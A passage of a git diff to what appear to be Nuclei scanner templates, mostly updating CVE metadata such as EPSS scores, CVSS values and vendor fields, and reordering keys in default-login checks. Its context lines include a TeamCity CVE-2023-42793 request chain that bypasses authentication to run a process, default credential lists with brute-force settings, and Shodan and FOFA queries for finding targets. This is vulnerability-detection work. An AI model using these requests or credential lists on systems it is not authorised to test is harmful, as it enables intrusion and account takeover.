a/http/cves/2023/CVE-2023-4174.yaml +++ b/http/cves/2023/CVE-2023-4174.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-4174 cwe-id: CWE-79 epss-score: 0.00209 - epss-percentile: 0.58186 + epss-percentile: 0.58585 cpe: cpe:2.3:a:moosocial:moostore:3.1.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-41892.yaml b/http/cves/2023/CVE-2023-41892.yaml index fe677be73f..0b3a406a4e 100644 --- a/http/cves/2023/CVE-2023-41892.yaml +++ b/http/cves/2023/CVE-2023-41892.yaml @@ -12,17 +12,20 @@ info: - https://github.com/craftcms/cms/commit/7359d18d46389ffac86c2af1e0cd59e37c298857 - https://github.com/craftcms/cms/commit/a270b928f3d34ad3bd953b81c304424edd57355e classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L - cvss-score: 10 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2023-41892 cwe-id: CWE-94 - epss-score: 0.00044 - epss-percentile: 0.08209 + epss-score: 0.20628 + epss-percentile: 0.95794 + cpe: cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - publicwww-query: "craftcms" + max-request: 1 + vendor: craftcms + product: craft_cms shodan-query: http.favicon.hash:-47932290 + publicwww-query: "craftcms" tags: cve,cve2023,rce,unauth,craftcms http: diff --git a/http/cves/2023/CVE-2023-42442.yaml b/http/cves/2023/CVE-2023-42442.yaml index 6ab536c1cd..c5fb0761a6 100644 --- a/http/cves/2023/CVE-2023-42442.yaml +++ b/http/cves/2023/CVE-2023-42442.yaml @@ -3,15 +3,26 @@ id: CVE-2023-42442 info: name: JumpServer > 3.6.4 - Information Disclosure author: xianke - severity: high + severity: medium description: | JumpServer is an open source bastion host and a professional operation and maintenance security audit system. Starting in version 3.0.0 and prior to versions 3.5.5 and 3.6.4, session replays can download without authentication. Session replays stored in S3, OSS, or other cloud storage are not affected. The api `/api/v1/terminal/sessions/` permission control is broken and can be accessed anonymously. SessionViewSet permission classes set to `[RBACPermission | IsSessionAssignee]`, relation is or, so any permission matched will be allowed. Versions 3.5.5 and 3.6.4 have a fix. After upgrading, visit the api `$HOST/api/v1/terminal/sessions/?limit=1`. The expected http response code is 401 (`not_authenticated`). reference: - https://github.com/jumpserver/jumpserver/blob/v3.6.1/apps/terminal/api/session/session.py#L91 - https://nvd.nist.gov/vuln/detail/CVE-2023-42442 + - https://github.com/jumpserver/jumpserver/commit/0a58bba59cd275bab8e0ae58bf4b359fbc5eb74a + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2023-42442 + cwe-id: CWE-287 + epss-score: 0.09005 + epss-percentile: 0.93903 + cpe: cpe:2.3:a:fit2cloud:jumpserver:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 + vendor: fit2cloud + product: jumpserver fofa-query: title="JumpServer" tags: cve,cve2023,jumpserver,exposure diff --git a/http/cves/2023/CVE-2023-42793.yaml b/http/cves/2023/CVE-2023-42793.yaml index fb9b0fc02b..49db6ccc90 100644 --- a/http/cves/2023/CVE-2023-42793.yaml +++ b/http/cves/2023/CVE-2023-42793.yaml @@ -11,22 +11,23 @@ info: - https://attackerkb.com/topics/1XEEEkGHzt/cve-2023-42793/rapid7-analysis - https://www.sonarsource.com/blog/teamcity-vulnerability - https://nvd.nist.gov/vuln/detail/CVE-2023-42793 + - https://attackerkb.com/topics/1XEEEkGHzt/cve-2023-42793 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-42793 cwe-id: CWE-288 - epss-score: 0.00091 - epss-percentile: 0.38288 + epss-score: 0.97209 + epss-percentile: 0.99758 cpe: cpe:2.3:a:jetbrains:teamcity:*:*:*:*:*:*:*:* metadata: - max-request: 5 verified: true - shodan-query: title:TeamCity - fofa-query: title=TeamCity + max-request: 5 vendor: jetbrains product: teamcity - tags: cve,cve2023,jetbrains,teamcity,rce,auth-bypass,intrusive + shodan-query: title:TeamCity + fofa-query: title=TeamCity + tags: cve,cve2023,jetbrains,teamcity,rce,auth-bypass,intrusive,kev http: - raw: @@ -34,23 +35,19 @@ http: DELETE /app/rest/users/id:1/tokens/RPC2 HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - - | POST /app/rest/users/id:1/tokens/RPC2 HTTP/1.1 Host: {{Hostname}} - - | POST /admin/dataDir.html?action=edit&fileName=config%2Finternal.properties&content=rest.debug.processes.enable=true HTTP/1.1 Host: {{Hostname}} Authorization: Bearer {{token}} Content-Type: application/x-www-form-urlencoded - - | POST /admin/admin.html?item=diagnostics&tab=dataDir&file=config/internal.properties HTTP/1.1 Host: {{Hostname}} Authorization: Bearer {{token}} Content-Type: application/x-www-form-urlencoded - - | POST /app/rest/debug/processes?exePath=echo¶ms={{randstr}} HTTP/1.1 Host: {{Hostname}} diff --git a/http/cves/2023/CVE-2023-43261.yaml b/http/cves/2023/CVE-2023-43261.yaml index 14cdba841a..e434c03d6b 100644 --- a/http/cves/2023/CVE-2023-43261.yaml +++ b/http/cves/2023/CVE-2023-43261.yaml @@ -10,10 +10,22 @@ info: - https://medium.com/@win3zz/inside-the-router-how-i-accessed-industrial-routers-and-reported-the-flaws-29c34213dfdf - https://github.com/win3zz/CVE-2023-43261 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-43261 + - http://milesight.com + - http://ur5x.com + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2023-43261 + cwe-id: CWE-532 + epss-score: 0.00476 + epss-percentile: 0.72972 + cpe: cpe:2.3:o:milesight:ur5x_firmware:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:rt_title verified: true + max-request: 1 + vendor: milesight + product: ur5x_firmware + shodan-query: http.html:rt_title tags: cve,cve2023,router,milesight,disclosure,unauth,iot http: @@ -22,6 +34,7 @@ http: - "{{BaseURL}}/lang/log/httpd.log" max-size: 5000 + extractors: - type: regex regex: diff --git a/http/cves/2023/CVE-2023-4451.yaml b/http/cves/2023/CVE-2023-4451.yaml index d08d2f7d88..07cfbfef42 100644 --- a/http/cves/2023/CVE-2023-4451.yaml +++ b/http/cves/2023/CVE-2023-4451.yaml @@ -10,16 +10,22 @@ info: - https://huntr.dev/bounties/4e111c3e-6cf3-4b4c-b3c1-a540bf30f8fa/ - https://github.com/Cockpit-HQ/Cockpit/commit/30609466c817e39f9de1871559603e93cd4d0d0c - https://nvd.nist.gov/vuln/detail/CVE-2023-4451 + - https://github.com/cockpit-hq/cockpit/commit/30609466c817e39f9de1871559603e93cd4d0d0c classification: - cve-id: CVE-2023-4451 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 + cve-id: CVE-2023-4451 cwe-id: CWE-79 + epss-score: 0.0007 + epss-percentile: 0.29114 + cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 + vendor: agentejo + product: cockpit shodan-query: html:"Cockpit" - tags: cve,cve2023,cockpit,xss + tags: huntr,cve,cve2023,cockpit,xss http: - method: GET diff --git a/http/cves/2023/CVE-2023-4568.yaml b/http/cves/2023/CVE-2023-4568.yaml index bd01f96b1e..ea58e035f2 100644 --- a/http/cves/2023/CVE-2023-4568.yaml +++ b/http/cves/2023/CVE-2023-4568.yaml @@ -14,8 +14,8 @@ info: cvss-score: 6.5 cve-id: CVE-2023-4568 cwe-id: CWE-287 - epss-score: 0.00046 - epss-percentile: 0.14237 + epss-score: 0.00261 + epss-percentile: 0.63503 cpe: cpe:2.3:a:papercut:papercut_ng:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-4634.yaml b/http/cves/2023/CVE-2023-4634.yaml index 0ac4ef7924..f4e7ef9965 100644 --- a/http/cves/2023/CVE-2023-4634.yaml +++ b/http/cves/2023/CVE-2023-4634.yaml @@ -11,11 +11,22 @@ info: - https://patrowl.io/blog-wordpress-media-library-rce-cve-2023-4634/ - https://fr.wordpress.org/plugins/media-library-assistant/advanced/ - https://cve.report/CVE-2023-4634 + - https://packetstormsecurity.com/files/174508/wpmla309-lfiexec.tgz + - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=2955933%40media-library-assistant&new=2955933%40media-library-assistant&sfp_email=&sfph_mail=#file4 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2023-4634 + cwe-id: CWE-73 + epss-score: 0.01945 + epss-percentile: 0.87333 + cpe: cpe:2.3:a:davidlingren:media_library_assistant:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 2 + vendor: davidlingren + product: media_library_assistant + framework: wordpress publicwww-query: "wp-content/plugins/media-library-assistant" tags: cve,cve2023,wordpress,wp,wp-plugin,lfi,rce,media-library-assistant diff --git a/http/cves/2023/CVE-2023-4714.yaml b/http/cves/2023/CVE-2023-4714.yaml index 2122d9fd39..a8c90ac689 100644 --- a/http/cves/2023/CVE-2023-4714.yaml +++ b/http/cves/2023/CVE-2023-4714.yaml @@ -5,17 +5,25 @@ info: author: Farish severity: high description: | - A vulnerability was found in PlayTube 3.0.1 and classified as problematic. This issue affects some unknown processing of the component Redirect Handler. The manipulation leads to information disclosure. The attack may be initiated remotely. + A vulnerability was found in PlayTube 3.0.1 and classified as problematic. This issue affects some unknown processing of the component Redirect Handler. The manipulation leads to information disclosure. The attack may be initiated remotely. reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-4714 - https://www.exploitalert.com/view-details.html?id=39826 + - https://vuldb.com/?ctiid.238577 + - https://vuldb.com/?id.238577 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 + cve-id: CVE-2023-4714 cwe-id: CWE-200 + epss-score: 0.02146 + epss-percentile: 0.88009 + cpe: cpe:2.3:a:playtube:playtube:3.0.1:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 + vendor: playtube + product: playtube tags: cve,cve2023,playtube,exposure http: diff --git a/http/cves/2023/CVE-2023-5074.yaml b/http/cves/2023/CVE-2023-5074.yaml index d6b876e592..30e1b75c88 100644 --- a/http/cves/2023/CVE-2023-5074.yaml +++ b/http/cves/2023/CVE-2023-5074.yaml @@ -14,18 +14,18 @@ info: classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 - cve-id: CVE-2023-0563 + cve-id: CVE-2023-5074 cwe-id: CWE-798 - epss-score: 0.00563 - epss-percentile: 0.74832 + epss-score: 0.02445 + epss-percentile: 0.88768 cpe: cpe:2.3:a:dlink:d-view_8:2.0.1.28:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.favicon.hash:-1317621215 - fofa-query: icon_hash="-1317621215" vendor: dlink product: d-view_8 + shodan-query: http.favicon.hash:-1317621215 + fofa-query: icon_hash="-1317621215" tags: cve,cve2023,d-link,auth-bypass http: diff --git a/http/default-logins/3com/3com-nj2000-default-login.yaml b/http/default-logins/3com/3com-nj2000-default-login.yaml index 20592b3935..6fd1afb624 100644 --- a/http/default-logins/3com/3com-nj2000-default-login.yaml +++ b/http/default-logins/3com/3com-nj2000-default-login.yaml @@ -12,8 +12,8 @@ info: cvss-score: 8.3 cwe-id: CWE-522 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"ManageEngine Password" fofa-query: body="NJ2000" tags: default-login,3com,nj2000 diff --git a/http/default-logins/UCMDB/ucmdb-default-login.yaml b/http/default-logins/UCMDB/ucmdb-default-login.yaml index d47467821f..5ce591bcfc 100644 --- a/http/default-logins/UCMDB/ucmdb-default-login.yaml +++ b/http/default-logins/UCMDB/ucmdb-default-login.yaml @@ -4,15 +4,14 @@ info: name: Micro Focus Universal CMDB Default Login author: dwisiswant0 severity: high - description: Micro Focus Universal CMDB default login credentials were discovered for diagnostics/admin. Note there is potential for this to be chained together with other vulnerabilities as with CVE-2020-11853 - and CVE-2020-11854. + description: Micro Focus Universal CMDB default login credentials were discovered for diagnostics/admin. Note there is potential for this to be chained together with other vulnerabilities as with CVE-2020-11853 and CVE-2020-11854. reference: - https://packetstormsecurity.com/files/161182/Micro-Focus-UCMDB-Remote-Code-Execution.htm classification: cwe-id: CWE-798 - tags: ucmdb,default-login,packetstorm metadata: max-request: 1 + tags: ucmdb,default-login,packetstorm http: - raw: diff --git a/http/default-logins/abb/cs141-default-login.yaml b/http/default-logins/abb/cs141-default-login.yaml index aea23d5410..46db224ac4 100644 --- a/http/default-logins/abb/cs141-default-login.yaml +++ b/http/default-logins/abb/cs141-default-login.yaml @@ -34,8 +34,8 @@ http: - cs141-snmp - engineer - guest - stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/default-logins/activemq/activemq-default-login.yaml b/http/default-logins/activemq/activemq-default-login.yaml index 2aca94ca14..5ecec4831f 100644 --- a/http/default-logins/activemq/activemq-default-login.yaml +++ b/http/default-logins/activemq/activemq-default-login.yaml @@ -7,9 +7,9 @@ info: description: Apache ActiveMQ default login information was discovered. reference: - https://knowledge.broadcom.com/external/article/142813/vulnerability-apache-activemq-admin-con.html - tags: apache,activemq,default-login metadata: max-request: 2 + tags: apache,activemq,default-login http: - raw: diff --git a/http/default-logins/adminer-default-login.yaml b/http/default-logins/adminer-default-login.yaml index f7c20687e3..bc1918e9c6 100644 --- a/http/default-logins/adminer-default-login.yaml +++ b/http/default-logins/adminer-default-login.yaml @@ -13,8 +13,8 @@ info: cvss-score: 8.3 cwe-id: CWE-522 metadata: - max-request: 5 verified: true + max-request: 5 shodan-query: http.title:adminer tags: default-login,adminer @@ -37,11 +37,11 @@ http: - 123 - 123456 - 123456789 - host-redirects: true max-redirects: 1 stop-at-first-match: true cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/default-logins/aem/aem-default-login.yaml b/http/default-logins/aem/aem-default-login.yaml index c965d397a5..2cb9154860 100644 --- a/http/default-logins/aem/aem-default-login.yaml +++ b/http/default-logins/aem/aem-default-login.yaml @@ -38,7 +38,6 @@ http: - anonymous - jdoe@geometrixx.info - aparker@geometrixx.info - aem_pass: - admin - password @@ -48,8 +47,8 @@ http: - anonymous - jdoe - aparker - stop-at-first-match: true + matchers-condition: and matchers: - type: status diff --git a/http/default-logins/aem/aem-felix-console.yaml b/http/default-logins/aem/aem-felix-console.yaml index ff92398cdf..72b59e05d8 100644 --- a/http/default-logins/aem/aem-felix-console.yaml +++ b/http/default-logins/aem/aem-felix-console.yaml @@ -24,17 +24,17 @@ http: path: - "{{BaseURL}}/system/console/bundles" - "{{BaseURL}}///system///console///bundles" + headers: Authorization: Basic {{base64(username + ':' + password)}} - attack: pitchfork payloads: username: - admin password: - admin - stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/default-logins/alibaba/canal-default-login.yaml b/http/default-logins/alibaba/canal-default-login.yaml index 71fffc3935..972289c479 100644 --- a/http/default-logins/alibaba/canal-default-login.yaml +++ b/http/default-logins/alibaba/canal-default-login.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - tags: alibaba,default-login metadata: max-request: 1 + tags: alibaba,default-login http: - raw: diff --git a/http/default-logins/alphaweb/alphaweb-default-login.yaml b/http/default-logins/alphaweb/alphaweb-default-login.yaml index 9b61b34b0f..2a7d09e916 100644 --- a/http/default-logins/alphaweb/alphaweb-default-login.yaml +++ b/http/default-logins/alphaweb/alphaweb-default-login.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N cvss-score: 5.8 cwe-id: CWE-522 - tags: default-login,AlphaWeb metadata: max-request: 1 + tags: default-login,AlphaWeb http: - raw: diff --git a/http/default-logins/ambari/ambari-default-login.yaml b/http/default-logins/ambari/ambari-default-login.yaml index 4dbb3aef67..d284a27d6e 100644 --- a/http/default-logins/ambari/ambari-default-login.yaml +++ b/http/default-logins/ambari/ambari-default-login.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - tags: ambari,default-login,apache metadata: max-request: 1 + tags: ambari,default-login,apache http: - raw: @@ -21,6 +21,7 @@ http: GET /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name HTTP/1.1 Host: {{Hostname}} Authorization: Basic {{base64(username + ':' + password)}} + payloads: username: - admin diff --git a/http/default-logins/apache/airflow-default-login.yaml b/http/default-logins/apache/airflow-default-login.yaml index fb8a0df32d..1f3b386144 100644 --- a/http/default-logins/apache/airflow-default-login.yaml +++ b/http/default-logins/apache/airflow-default-login.yaml @@ -22,7 +22,6 @@ http: GET /login/ HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - - | POST /login/ HTTP/1.1 Host: {{Hostname}} @@ -38,8 +37,8 @@ http: - airflow password: - airflow - cookie-reuse: true + extractors: - type: regex name: csrf_token @@ -47,8 +46,8 @@ http: internal: true regex: - 'type="hidden" value="(.*?)">' - req-condition: true + matchers-condition: and matchers: - type: dsl diff --git a/http/default-logins/apache/apisix-default-login.yaml b/http/default-logins/apache/apisix-default-login.yaml index 0f5054a451..4dbdd00276 100644 --- a/http/default-logins/apache/apisix-default-login.yaml +++ b/http/default-logins/apache/apisix-default-login.yaml @@ -13,9 +13,9 @@ info: cwe-id: CWE-522 metadata: max-request: 1 + product: https://apisix.apache.org shodan-query: title:"Apache APISIX Dashboard" fofa-query: title="Apache APISIX Dashboard" - product: https://apisix.apache.org tags: apisix,apache,default-login http: diff --git a/http/default-logins/apache/dubbo-admin-default-login.yaml b/http/default-logins/apache/dubbo-admin-default-login.yaml index 3ac3fee6cc..d448110fd4 100644 --- a/http/default-logins/apache/dubbo-admin-default-login.yaml +++ b/http/default-logins/apache/dubbo-admin-default-login.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - tags: dubbo,apache,default-login metadata: max-request: 2 + tags: dubbo,apache,default-login http: - raw: diff --git a/http/default-logins/apache/kafka-center-default-login.yaml b/http/default-logins/apache/kafka-center-default-login.yaml index a4c0948bd0..27e36decc9 100644 --- a/http/default-logins/apache/kafka-center-default-login.yaml +++ b/http/default-logins/apache/kafka-center-default-login.yaml @@ -34,7 +34,6 @@ http: matchers-condition: and matchers: - - type: word words: - '"code":200' diff --git a/http/default-logins/apache/karaf-default-login.yaml b/http/default-logins/apache/karaf-default-login.yaml index 6920bcdbcc..bd82a90c6a 100644 --- a/http/default-logins/apache/karaf-default-login.yaml +++ b/http/default-logins/apache/karaf-default-login.yaml @@ -12,8 +12,8 @@ info: cvss-score: 8.3 cwe-id: CWE-522 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: realm="karaf" tags: default-login,apache,karaf @@ -26,6 +26,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/default-logins/apache/kylin-default-login.yaml b/http/default-logins/apache/kylin-default-login.yaml index 8f1a62f9dd..5f90db16d1 100644 --- a/http/default-logins/apache/kylin-default-login.yaml +++ b/http/default-logins/apache/kylin-default-login.yaml @@ -10,9 +10,9 @@ info: - https://github.com/hanc00l/pocGoby2Xray/blob/main/xraypoc/Apache_Kylin_Console_Default_password.yml - https://github.com/Wker666/Demo/blob/main/script/%E6%BC%8F%E6%B4%9E%E6%8E%A2%E6%B5%8B/Kylin/Apache%20Kylin%20Console%20%E6%8E%A7%E5%88%B6%E5%8F%B0%E5%BC%B1%E5%8F%A3%E4%BB%A4.wker metadata: - fofa-query: app="APACHE-kylin" - max-request: 6 verified: true + max-request: 6 + fofa-query: app="APACHE-kylin" tags: kylin,default-login,apache http: @@ -31,8 +31,8 @@ http: - KYLIN - kylin - 123456 - stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/default-logins/apache/tomcat-default-login.yaml b/http/default-logins/apache/tomcat-default-login.yaml index 258e27444a..a69ae25af4 100644 --- a/http/default-logins/apache/tomcat-default-login.yaml +++ b/http/default-logins/apache/tomcat-default-login.yaml @@ -37,7 +37,6 @@ http: - server_admin - tomcat - xampp - password: - ADMIN - OvW*busr1 @@ -66,8 +65,7 @@ http: - toor - vagrant - xampp - - attack: clusterbomb # Available options: sniper, pitchfork and clusterbomb + attack: clusterbomb # Available options: sniper, pitchfork and clusterbomb threads: 30 matchers-condition: and diff --git a/http/default-logins/apache/tomcat-examples-login.yaml b/http/default-logins/apache/tomcat-examples-login.yaml index 3f47e9b6d3..f79a682a11 100644 --- a/http/default-logins/apache/tomcat-examples-login.yaml +++ b/http/default-logins/apache/tomcat-examples-login.yaml @@ -7,13 +7,13 @@ info: description: Apache Tomcat 10.1.0-M1 to 10.1.0-M16, 10.0.0-M1 to 10.0.22, 9.0.30 to 9.0.64 and 8.5.50 to 8.5.81 default login credentials were successful. reference: - https://c0nqr0r.github.io/CVE-2022-34305/ - metadata: - max-request: 2 - verified: true classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 + metadata: + verified: true + max-request: 2 tags: default-login,tomcat http: @@ -21,7 +21,6 @@ http: - | GET /examples/jsp/security/protected/index.jsp HTTP/1.1 Host: {{Hostname}} - - | POST /examples/jsp/security/protected/j_security_check HTTP/1.1 Host: {{Hostname}} @@ -35,10 +34,10 @@ http: - tomcat password: - tomcat - host-redirects: true max-redirects: 2 cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/default-logins/apollo/apollo-default-login.yaml b/http/default-logins/apollo/apollo-default-login.yaml index 27bd10ba64..3172d239be 100644 --- a/http/default-logins/apollo/apollo-default-login.yaml +++ b/http/default-logins/apollo/apollo-default-login.yaml @@ -26,7 +26,6 @@ http: Referer: {{BaseURL}}/signin? username={{user}}&password={{pass}}&login-submit=Login - - | GET /user HTTP/1.1 Host: {{Hostname}} @@ -37,9 +36,9 @@ http: - apollo pass: - admin - cookie-reuse: true req-condition: true + matchers-condition: and matchers: - type: word diff --git a/http/default-logins/arl/arl-default-login.yaml b/http/default-logins/arl/arl-default-login.yaml index d2302729d9..3267c6fa25 100644 --- a/http/default-logins/arl/arl-default-login.yaml +++ b/http/default-logins/arl/arl-default-login.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - tags: arl,default-login metadata: max-request: 1 + tags: arl,default-login http: - raw: @@ -31,7 +31,6 @@ http: matchers-condition: and matchers: - - type: word condition: and words: diff --git a/http/default-logins/audiocodes/audiocodes-default-login.yaml b/http/default-logins/audiocodes/audiocodes-default-login.yaml index 309769edc7..b4cc589011 100644 --- a/http/default-logins/audiocodes/audiocodes-default-login.yaml +++ b/http/default-logins/audiocodes/audiocodes-default-login.yaml @@ -9,9 +9,9 @@ info: - https://wiki.freepbx.org/display/FPG/Supported+Devices-Audio+Codes#:~:text=Reset%20to%20Factory%20Defaults,-Press%20the%20Menu&text=Then%2C%20enter%20the%20Admin%20password,is%20%221234%22%20by%20default classification: cwe-id: CWE-798 - tags: iot,audiocodes,default-login metadata: max-request: 1 + tags: iot,audiocodes,default-login http: - raw: @@ -28,8 +28,8 @@ http: - admin password: - "1234" - unsafe: true + matchers-condition: and matchers: - type: word diff --git a/http/default-logins/azkaban/azkaban-default-login.yaml b/http/default-logins/azkaban/azkaban-default-login.yaml index 1a589e9daa..af9ab75c27 100644 --- a/http/default-logins/azkaban/azkaban-default-login.yaml +++ b/http/default-logins/azkaban/azkaban-default-login.yaml @@ -27,6 +27,7 @@ http: password: - admin attack: pitchfork + matchers-condition: and matchers: - type: word diff --git a/http/default-logins/bloofoxcms-default-login.yaml b/http/default-logins/bloofoxcms-default-login.yaml index b8b4f8d346..538ec8bd86 100644 --- a/http/default-logins/bloofoxcms-default-login.yaml +++ b/http/default-logins/bloofoxcms-default-login.yaml @@ -11,8 +11,8 @@ info: - https://www.bloofox.com metadata: verified: "true" - fofa-query: "Powered by bloofoxCMS" max-request: 1 + fofa-query: "Powered by bloofoxCMS" tags: bloofox,cms,default-login http: @@ -30,7 +30,6 @@ http: - "admin" password: - "admin" - redirects: true max-redirects: 2 matchers: diff --git a/http/default-logins/caimore/caimore-default-login.yaml b/http/default-logins/caimore/caimore-default-login.yaml index fa692c7c28..e06229d92c 100644 --- a/http/default-logins/caimore/caimore-default-login.yaml +++ b/http/default-logins/caimore/caimore-default-login.yaml @@ -7,8 +7,8 @@ info: description: | The gateway of Xiamen Caimao Communication Technology Co., Ltd. is designed with open software architecture. It is a metal shell design, with two Ethernet RJ45 interfaces, and an industrial design wireless gateway using 3G/4G/5G wide area network for Internet communication. There is a command execution vulnerability in the formping file of the gateway of Xiamen Caimao Communication Technology Co., Ltd. An attacker can use this vulnerability to arbitrarily execute code on the server side, write to the back door, obtain server permissions, and then control the entire web server. metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: app="CAIMORE-Gateway" tags: ciamore-gateway,default-login diff --git a/http/default-logins/chinaunicom/chinaunicom-default-login.yaml b/http/default-logins/chinaunicom/chinaunicom-default-login.yaml index ae51e43f36..b1a0190226 100644 --- a/http/default-logins/chinaunicom/chinaunicom-default-login.yaml +++ b/http/default-logins/chinaunicom/chinaunicom-default-login.yaml @@ -7,9 +7,9 @@ info: description: Default login credentials were discovered for a China Unicom modem. classification: cwe-id: CWE-798 - tags: chinaunicom,default-login metadata: max-request: 1 + tags: chinaunicom,default-login http: - raw: diff --git a/http/default-logins/cobbler/cobbler-default-login.yaml b/http/default-logins/cobbler/cobbler-default-login.yaml index 1831235326..1a3c15052b 100644 --- a/http/default-logins/cobbler/cobbler-default-login.yaml +++ b/http/default-logins/cobbler/cobbler-default-login.yaml @@ -11,9 +11,9 @@ info: - https://github.com/cobbler/cobbler/issues/2909 classification: cwe-id: CWE-798 - tags: cobbler,default-login,api,seclists metadata: max-request: 2 + tags: cobbler,default-login,api,seclists http: - raw: diff --git a/http/default-logins/cobbler/hue-default-credential.yaml b/http/default-logins/cobbler/hue-default-credential.yaml index 1030b6682f..1a67b21a24 100644 --- a/http/default-logins/cobbler/hue-default-credential.yaml +++ b/http/default-logins/cobbler/hue-default-credential.yaml @@ -21,7 +21,6 @@ http: - | GET /hue/accounts/login?next=/ HTTP/1.1 Host: {{Hostname}} - - | POST /hue/accounts/login HTTP/1.1 Host: {{Hostname}} @@ -36,14 +35,13 @@ http: - hue - hadoop - cloudera - pass: - admin - hue - hadoop - cloudera - cookie-reuse: true + extractors: - type: regex name: csrfmiddlewaretoken @@ -52,9 +50,9 @@ http: group: 1 regex: - name='csrfmiddlewaretoken' value='(.+?)' - req-condition: true stop-at-first-match: true + matchers-condition: and matchers: - type: dsl diff --git a/http/default-logins/d-link/dlink-centralized-default-login.yaml b/http/default-logins/d-link/dlink-centralized-default-login.yaml index 920767ab3d..4ce1b5627d 100755 --- a/http/default-logins/d-link/dlink-centralized-default-login.yaml +++ b/http/default-logins/d-link/dlink-centralized-default-login.yaml @@ -7,8 +7,8 @@ info: description: | D-Link AC Centralized Management System default login credentials were discovered. metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: title="AC集中管理平台" && body="D-Link路由器管理页" tags: default-login,dlink @@ -46,4 +46,4 @@ http: part: body words: - "window.open" - condition: and \ No newline at end of file + condition: and diff --git a/http/default-logins/datahub/datahub-metadata-default-login.yaml b/http/default-logins/datahub/datahub-metadata-default-login.yaml index 1363070842..79af9538ed 100644 --- a/http/default-logins/datahub/datahub-metadata-default-login.yaml +++ b/http/default-logins/datahub/datahub-metadata-default-login.yaml @@ -12,8 +12,8 @@ info: cvss-score: 8.3 cwe-id: CWE-522 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"DataHub" tags: datahub,default-login diff --git a/http/default-logins/dataiku/dataiku-default-login.yaml b/http/default-logins/dataiku/dataiku-default-login.yaml index bb42a192f1..91ffae142f 100644 --- a/http/default-logins/dataiku/dataiku-default-login.yaml +++ b/http/default-logins/dataiku/dataiku-default-login.yaml @@ -12,8 +12,8 @@ info: cvss-score: 8.3 cwe-id: CWE-522 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"dataiku" tags: default-login,dataiku diff --git a/http/default-logins/dell/dell-idrac-default-login.yaml b/http/default-logins/dell/dell-idrac-default-login.yaml index b61ef46e58..41a853c133 100644 --- a/http/default-logins/dell/dell-idrac-default-login.yaml +++ b/http/default-logins/dell/dell-idrac-default-login.yaml @@ -9,9 +9,9 @@ info: - https://securityforeveryone.com/tools/dell-idrac6-7-8-default-login-scanner classification: cwe-id: CWE-798 - tags: dell,idrac,default-login metadata: max-request: 2 + tags: dell,idrac,default-login http: - raw: @@ -32,8 +32,8 